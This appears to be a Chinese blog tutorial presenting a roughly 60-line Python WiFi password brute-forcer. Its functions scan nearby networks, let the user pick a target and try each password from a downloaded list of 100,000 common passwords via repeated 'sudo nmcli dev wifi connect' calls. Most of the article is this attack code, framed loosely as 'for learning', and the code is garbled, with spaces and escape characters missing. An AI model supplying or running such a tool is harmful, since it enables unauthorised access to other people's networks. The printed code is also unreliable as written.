WiFi现在已经遍布我们生活方方面面 。如今 。如论到工作单位 。还是租住的房子 。或者一家餐厅 。随处都可以连上WiFi 。
因此 。我们对WiFi密码的需求也没有之前那么迫切了 。
本文 。将会通过Python教大家如何实现 。这里纯粹是为了学习用途 。
1. WiFi列表首先 。我们需要获取附近的WiFi列表 。
下面 。就来写一个函数来获取附近的WiFi列表 。函数命名为display_targets:
def display_targets(networks, security_type):print("Select a target: n")rows, columns = os.popen('stty size', 'r').read().split()for i in range(len(networks)):width = len(str(str(i+1)+". "+networks[i]+security_type[i]))+2spacer = " "if (int(columns) >= 100):calc = int((int(columns)-int(width))*0.75)else:calc = int(columns)-int(width)for index in range(calc):spacer += "."if index == (calc-1):spacer += " "print(str(i+1)+". "+networks[i]+spacer+security_type[i])
这里 。我们会用到ssid工具包 。用来获取附近的WiFi列表 。存入到参数networks 。
2. 选择WiFi获取WiFi列表之后 。下一步要做的就是选择我们想要连接的WiFi 。
def prompt_for_target_choice(max):whileTrue:try:selected = int(input("nEnter number of target: "))if(selected >= 1and selected <= max):return selected - 1except Exception as e:ignore = eprint("Invalid choice: Please pick a number between 1 and " + str(max))
这里很简单 。就是一些通用的Python功能 。3. 暴力破解目前已经获取并且选择了想要连接的WiFi 。那么如何获取到它的密码呢?
这里要用到一种比较常见的方式:暴力破解 。
【如何强制破解wifi密码 我只用了60行代码…】这里 。要用到Github上一个项目 。它收集了最常用的10万个WiFi密码 。我们就用着10万个密码暴力解锁WiFi即可 。
def brute_force(selected_network, passwords, args):for password in passwords:# necessary due to NetworkManager restart after unsuccessful attempt at loginpassword = password.strip()# when when obtain password from url we need the decode utf-8 however we doesnt when reading from fileif isinstance(password, str):decoded_line = passwordelse:decoded_line = password.decode("utf-8")if args.verbose isTrue:print(bcolors.HEADER+"** TESTING **: with password '" +decoded_line+"'"+bcolors.ENDC)if (len(decoded_line) >= 8):time.sleep(3)creds = os.popen("sudo nmcli dev wifi connect " +selected_network+" password "+decoded_line).read()# print(creds)if ("Error:"in creds.strip()):if args.verbose isTrue:print(bcolors.FAIL+"** TESTING **: password '" +decoded_line+"' failed."+bcolors.ENDC)else:sys.exit(bcolors.OKGREEN+"** KEY FOUND! **: password '" +decoded_line+"' succeeded."+bcolors.ENDC)else:if args.verbose isTrue:print(bcolors.OKCYAN+"** TESTING **: password '" +decoded_line+"' too short, passing."+bcolors.ENDC)print(bcolors.FAIL+"** RESULTS **: All passwords failed :("+bcolors.ENDC)
核心功能3个函数就完成了 。只用了60行Python代码!下面就把它们串联在一起:
def main():require_root()args = argument_parser()# The user chose to supplied their own urlif args.url isnotNone:passwords = fetch_password_from_url(args.url)# user elect to read passwords form a fileelif args.file isnotNone:file = open(args.file, "r")passwords = file.readlines()ifnot passwords:print("Password file cannot be empty!")exit(0)file.close()else:# fallback to the default list as the user didnt supplied a password listdefault_url = "https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt"passwords = fetch_password_from_url(default_url)# grabbing the list of the network ssidsfunc_call = start(1)networks = func_call[0]security_type = func_call[1]ifnot networks:print("No networks found!")sys.exit(-1)display_targets(networks, security_type)max = len(networks)pick = prompt_for_target_choice(max)target = networks[pick]print("nWifi-bf is running. If you would like to see passwords being tested in realtime, enable the [--verbose] flag at start.")brute_force(target, passwords, args)
执行函数 。就会在命令行下显示附近的WiFi列表 。选择之后就开始逐个尝试密码 。文章插图
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